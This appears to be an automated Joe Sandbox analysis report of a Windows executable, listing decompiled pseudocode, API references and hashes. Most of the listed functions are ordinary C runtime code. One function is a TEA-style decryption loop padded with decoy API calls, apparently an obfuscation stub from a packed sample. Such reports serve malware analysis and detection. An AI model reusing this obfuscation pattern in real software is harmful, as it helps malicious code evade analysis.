0x0040b716
0x00000000
0x0040b71a
0x0040b6eb
0x0040b6ee
0x0040b6f1
0x0040b6f2
0x0040b6f5
0x0040b6f7
0x0040b6f9
0x0040b6f9
0x00000000
0x0040b6f7
0x0040b688
0x0040b68a
0x0040b697
0x0040b697
0x0040b69b
0x0040b69d
0x0040b6a1
0x0040b6a3
0x0040b6a6
0x0040b6a6
0x0040b6a6
0x0040b6a8
0x0040b6a9
0x0040b6b3
0x0040b6b4
0x0040b6b9
0x0040b6bc
0x0040b6bf
0x0040b722
0x0040b722
0x0040b726
0x00000000
0x0040b6c1
0x0040b6c1
0x0040b6c3
0x0040b6c5
0x0040b6c7
0x0040b6c7
0x0040b6c9
0x0040b6cc
0x0040b6ce
0x0040b6d0
0x00000000
0x0040b6d2
0x0040b6d2
0x0040b6d2
0x00000000
0x0040b6d2
0x0040b6d0
0x0040b6bf
0x0040b68d
0x0040b693
0x0040b695
0x00000000
0x00000000
0x00000000
0x0040b695
0x0040b654
0x0040b657
0x0040b659
0x00000000
0x00000000
0x0040b65b
0x0040b710
0x0040b710
0x0040b710
0x00000000
0x0040b710
0x0040b661
0x0040b663
0x0040b665
0x0040b667
0x0040b667
0x0040b66f
0x0040b674
0x0040b677
0x0040b679
0x0040b67c
0x0040b67e
0x00000000
0x0040b700
0x0040b700
0x0040b700
0x00000000
0x0040b649
0x0040b643
0x0040b5e7
0x0040b5e7
0x0040b5ec
0x0040b5ed
0x0040b5ee
0x0040b5ef
0x0040b5f0
0x0040b5f1
0x0040b5f7
0x00000000
0x0040b5fc

APIs

__flush.LIBCMT ref: 0040B68D
__fileno.LIBCMT ref: 0040B6AD
__locking.LIBCMT ref: 0040B6B4
__flsbuf.LIBCMT ref: 0040B6DF

Part of subcall function 0040747B: __getptd_noexit.LIBCMT ref: 0040747B

Part of subcall function 00409867: __decode_pointer.LIBCMT ref: 00409872

Strings

w_@, xrefs: 0040B606
w_@, xrefs: 0040B6A3, 0040B683

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID: w_@$w_@
API String ID: 3240763771-614044935
Opcode ID: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
Instruction ID: 5f5606b89cac3dbd6312031acd89d28b1066f652792005636562e4df81556f48
Opcode Fuzzy Hash: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
Instruction Fuzzy Hash: 57419331A006049BDB249F6AC84455FB7B6EF80324F24893BE455B72C0D779DD518B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
pipeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404BB7(void* __eflags, unsigned int* _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr* _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t78;
				unsigned int* _t99;
				signed int _t104;
				unsigned int _t111;

				_t68 = _a4;
				_t111 =  *(_t68 + 4);
				_t69 =  *0x419478; // 0x5e13b97e
				_v48 = _t69;
				_t70 =  *0x41947c; // 0xdc48e54b
				_v52 = _t70;
				_v20 =  *_t68;
				_v16 = 0;
				_v56 = 0x9e3779b9;
				E00404BAD( &_v16);
				_v16 = _v16 + 0x23f;
				if( *0x4450c4 == 0x14) {
					BackupEventLogW(0, 0);
				}
				_t73 =  *0x419480; // 0x6a6347b4
				_v40 = _t73;
				_t74 =  *0x419484; // 0xd03480f9
				_v44 = _t74;
				_v36 = 0x20;
				_t104 = 2;
				do {
					_v28 = _t104;
					_v28 = _v28 + 3;
					_v8 = (_v20 << 4) + _v40;
					_t78 =  *0x4450c4;
					if(_t78 == 0xfa9) {
						 *0x444f24 = 0xedeb2e40;
					}
					if(_t78 == 0x3eb) {
						 *0x444e8c = 0;
					}
					_v24 = _v20;
					_v24 = _v24 + _v16;
					_v12 = _v20 >> 5;
					 *0x444f20 = 0xf4ea3dee;
					E00404BB4( &_v12, _v44);
					_v8 = _v8 ^ _v24;
					if( *0x4450c4 == 0x9e6) {
						GetLastError();
					}
					_v12 = _v12 ^ _v8;
					if( *0x4450c4 == 0x213) {
						WaitNamedPipeW(0, 0);
						__imp__AssignProcessToJobObject(0, 0);
						GetFullPathNameW(0, 0, 0, 0);
					}
					_t111 = _t111 - _v12;
					_v32 = _t104;
					_v32 = _v32 - 0x5396dd36;
					_v32 = _v32 + 0x5396dd38;
					_v8 = (_t111 << _v32) + _v48;
					_v24 = _v16 + _t111;
					_v12 = _t111 >> _v28;
					_v12 = _v12 + _v52;
					_v8 = _v8 ^ _v24;
					_v8 = _v8 ^ _v12;
					 *0x443e2c = 0;
					_v20 = _v20 - _v8;
					_v16 = _v16 - _v56;
					_t63 =  &_v36;
					 *_t63 = _v36 - 1;
				} while ( *_t63 != 0);
				_t99 = _a4;
				_t99[1] = _t111;
				 *_t99 = _v20;
				return _t99;
			}

0x00404bbd
0x00404bc4
0x00404bc7
0x00404bcc
0x00404bcf
0x00404bd7
0x00404bdd
0x00404be0
0x00404be3
0x00404bea
0x00404bef
0x00404bfd
0x00404c01
0x00404c01
0x00404c07
0x00404c0c
0x00404c0f
0x00404c16
0x00404c19
0x00404c20
0x00404c21
0x00404c21
0x00404c24
0x00404c31
0x00404c34
0x00404c3e
0x00404c40
0x00404c40
0x00404c4f
0x00404c51
0x00404c51
0x00404c5a
0x00404c60
0x00404c69
0x00404c72
0x00404c7c
0x00404c84
0x00404c91
0x00404c93
0x00404c93
0x00404c9c
0x00404ca9
0x00404cad
0x00404cb5
0x00404cbf
0x00404cbf
0x00404cc5
0x00404cc8
0x00404ccb
0x00404cd2
0x00404ce6
0x00404cee
0x00404cf5
0x00404cfb
0x00404d01
0x00404d07
0x00404d0a
0x00404d13
0x00404d19
0x00404d1c
0x00404d1c
0x00404d1c
0x00404d25
0x00404d2c
0x00404d30
0x00404d34

APIs

BackupEventLogW.ADVAPI32(00000000,00000000), ref: 00404C01
GetLastError.KERNEL32 ref: 00404C93
WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00404CAD
AssignProcessToJobObject.KERNEL32 ref: 00404CB5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CBF

Strings

, xrefs: 00404C19

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AssignBackupErrorEventFullLastNameNamedObjectPathPipeProcessWait
String ID:
API String ID: 2469782577-3916222277
Opcode ID: d84db55146c36003a7f7393f08569428c37f702ff9f7cd9bc2151b1b5ee15ded
Instruction ID: 7e24f3741826b6654a9f02b7982a749862b9fc0ced947816e583d1fe04c9a157
Opcode Fuzzy Hash: d84db55146c36003a7f7393f08569428c37f702ff9f7cd9bc2151b1b5ee15ded
Instruction Fuzzy Hash: 4951B2B5D01218EFDB00DFA9D984AAEBBF4FB99310F10806AE515F7250D374AA41CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416028 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00416028(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x4172f0);
				E00408168(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00415BC3(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040BD70(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00415C68(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0041614E(_t48, _t53, _t55, _t57, _t61);
				return E004081AD( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x00416028
0x00416028
0x0041602a
0x0041602f
0x00416034
0x00416036
0x00416039
0x0041603c
0x0041603f
0x00416046
0x00416057
0x00416065
0x00416073
0x0041607b
0x00416089
0x0041608f
0x00416096
0x00416099
0x004160af
0x004160b2
0x00416127
0x0041612e
0x00416135
0x00416142

APIs

__CreateFrameInfo.LIBCMT ref: 00416050

Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BD1
Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BDF

__getptd.LIBCMT ref: 0041605A

Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80

__getptd.LIBCMT ref: 00416068
__getptd.LIBCMT ref: 00416076
__getptd.LIBCMT ref: 00416081
_CallCatchBlock2.LIBCMT ref: 004160A7

Part of subcall function 00415C68: __CallSettingFrame@12.LIBCMT ref: 00415CB4

Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041615D
Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041616B

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
Instruction ID: 0daa8b67c47c473bc710cfcf4bfcec87d77ca9b3cc66d9d98589ed68b50df625
Opcode Fuzzy Hash: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
Instruction Fuzzy Hash: A311C9B1C00209DFDB00EFA5D945AEEBBB0FF04314F10806EF854A7291DB389A519B98

Uniqueness

Uniqueness Score: -1.00%

Function 004163D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 26%

			E004163D5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00416343(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0041591B(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00415DC0(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E00416028(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
				if(_t20 != 0) {
					E004158D4(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x004163d5
0x004163d5
0x004163d5
0x004163d5
0x004163da
0x004163de
0x004163e0
0x004163e3
0x004163e4
0x004163e5
0x004163e8
0x004163ed
0x004163ed
0x004163f0
0x004163f4
0x004163f7
0x004163fc
0x004163f9
0x004163f9
0x004163f9
0x004163ff
0x00416404
0x00416406
0x00416409
0x0041640c
0x0041640d
0x00416415
0x0041641a
0x0041641e
0x00416421
0x00416424
0x0041642a
0x0041642b
0x0041642e
0x00416438
0x0041643c
0x00000000
0x0041643c
0x00416442

APIs

___BuildCatchObject.LIBCMT ref: 004163E8

Part of subcall function 00416343: ___BuildCatchObjectHelper.LIBCMT ref: 00416379

_UnwindNestedFrames.LIBCMT ref: 004163FF
___FrameUnwindToState.LIBCMT ref: 0041640D

Strings

TsA, xrefs: 004163D7
csm, xrefs: 004163E4, 004163F9, 0041640C, 0041642A, 0041643A

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: TsA$csm
API String ID: 2163707966-3388165190
Opcode ID: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
Instruction ID: d69c25e17cad3efa29224d1e44031e3b4bab8f93dc90641abc2906f6c70405cc
Opcode Fuzzy Hash: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
Instruction Fuzzy Hash: 1901467100010AFBDF126F52CC45EEB7F6AEF08354F01802ABC1815121DB3AD9B1DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00415D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00415D77(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				intOrPtr* _t15;
				intOrPtr* _t18;
				void* _t22;

				_t25 = __esi;
				_t24 = __edi;
				_t23 = __edx;
				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0040BD70(_t22, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0040BD70(_t22, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L9;
				} else {
					__eflags = __eax - 0xe06d7363;
					if(__eflags != 0) {
						L9:
						__eflags = 0;
						return 0;
					} else {
						 *(E0040BD70(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
						_push(8);
						_push(0x416fc0);
						E00408168(_t22, __edi, __esi);
						_t18 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t30) + 0x78));
						if(_t18 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t18();
							_v8 = 0xfffffffe;
						}
						return E004081AD(E00411135(_t22, _t23, _t24, _t25));
					}
				}
			}

0x00415d77
0x00415d77
0x00415d77
0x00415d83
0x00415d88
0x00415da7
0x00415dae
0x00415db5
0x00415dba
0x00415dba
0x00415dba
0x00000000
0x00415d8a
0x00415d8a
0x00415d8f
0x00415dbc
0x00415dbc
0x00415dbf
0x00415d91
0x00415d96
0x0040c34d
0x0040c34f
0x0040c354
0x0040c35e
0x0040c363
0x0040c365
0x0040c369
0x0040c374
0x0040c374
0x0040c385
0x0040c385
0x00415d8f

APIs

__getptd.LIBCMT ref: 00415D91

Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80

__getptd.LIBCMT ref: 00415DA2
__getptd.LIBCMT ref: 00415DB0

Strings

MOC, xrefs: 00415D83
csm, xrefs: 00415D8A

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
Instruction ID: 7476e578de222c3f650eae696de84e137a600846ab43f73c4baadf4b58ee893f
Opcode Fuzzy Hash: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
Instruction Fuzzy Hash: 65E01A35110608CFC710AB69D04ABE977A5FF85318F1541A6E80CC73A3D73CE880968E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E92F Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040E92F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x417108);
				E00408168(__ebx, __edi, __esi);
				_t31 = E0040BD70(__ebx, __edx, _t35);
				_t15 =  *0x418d34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00407670(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x418c38; // 0x942c20
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x418810;
								if(_t33 != 0x418810) {
									_push(_t33);
									E0040617D();
								}
							}
						}
						_t21 =  *0x418c38; // 0x942c20
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x418c38; // 0x942c20
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0040E9CA();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00406BE8(0x20);
				}
				return E004081AD(_t33);
			}

0x0040e92f
0x0040e92f
0x0040e92f
0x0040e92f
0x0040e931
0x0040e936
0x0040e940
0x0040e942
0x0040e94a
0x0040e96b
0x0040e971
0x0040e975
0x0040e978
0x0040e97b
0x0040e981
0x0040e983
0x0040e985
0x0040e988
0x0040e98e
0x0040e990
0x0040e992
0x0040e998
0x0040e99a
0x0040e99b
0x0040e9a0
0x0040e998
0x0040e990
0x0040e9a1
0x0040e9a6
0x0040e9a9
0x0040e9af
0x0040e9b3
0x0040e9b3
0x0040e9b9
0x0040e9c0
0x0040e952
0x0040e952
0x0040e952
0x0040e957
0x0040e95b
0x0040e960
0x0040e968

APIs

__getptd.LIBCMT ref: 0040E93B

Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80

__amsg_exit.LIBCMT ref: 0040E95B
__lock.LIBCMT ref: 0040E96B
InterlockedDecrement.KERNEL32(?), ref: 0040E988
InterlockedIncrement.KERNEL32(00942C20), ref: 0040E9B3

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
Instruction ID: ab0f9b78bd71dce74febf2d25f83fab80e53a4f08a0c435d7ef074ac4792bfe4
Opcode Fuzzy Hash: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
Instruction Fuzzy Hash: 1B01C8B1906625DBC761AB2B9945B9A7360AF04754F04443FE800772D1CF3C6C61CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040617D Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E0040617D() {
				intOrPtr* _t10;
				intOrPtr _t13;
				void* _t15;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x416d00);
				_t8 = E00408168(_t15, _t22, _t23);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E004081AD(_t8);
				}
				if( *0x44625c != 3) {
					_push(_t24);
					L7:
					if(HeapFree( *0x4432c8, 0, ??) == 0) {
						_t10 = E0040747B();
						 *_t10 = E00407439(GetLastError());
					}
					goto L9;
				}
				E00407670(_t15, _t21, _t22, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E004076A3(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E004076D3();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E004061D3();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x0040617d
0x0040617f
0x00406184
0x00406189
0x0040618e
0x00406205
0x0040620a
0x0040620a
0x00406197
0x004061dc
0x004061dd
0x004061ed
0x004061ef
0x00406202
0x00406204
0x00000000
0x004061ed
0x0040619b
0x004061a1
0x004061a6
0x004061ac
0x004061b1
0x004061b3
0x004061b4
0x004061b5
0x004061bb
0x004061bc
0x004061c3
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x00000000
0x004061ce

APIs

__lock.LIBCMT ref: 0040619B

Part of subcall function 00407670: __mtinitlocknum.LIBCMT ref: 00407686
Part of subcall function 00407670: __amsg_exit.LIBCMT ref: 00407692
Part of subcall function 00407670: EnterCriticalSection.KERNEL32(?,?,?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001), ref: 0040769A

___sbh_find_block.LIBCMT ref: 004061A6
___sbh_free_block.LIBCMT ref: 004061B5
HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6

Memory Dump Source

Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: db484a3990fbe0cadc871ec08e73f824e3e60cc1aafe4cac5bf7a484ffdfff19
Instruction ID: 8a843b870c6c596149a6f540d40501c749865fbe93a0626fa4fdcb27d608762f
Opcode Fuzzy Hash: db484a3990fbe0cadc871ec08e73f824e3e60cc1aafe4cac5bf7a484ffdfff19
Instruction Fuzzy Hash: 3001A771D04211AAEB207F72AC05B5F3A649F01764F11407FF4527A1D2DA3D9991CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00410C88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00410C88() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x403638;
					_v28 =  *0x403630;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00410c8d
0x00410c95
0x00410cac
0x00410c58
0x00410c61
0x00410c6d
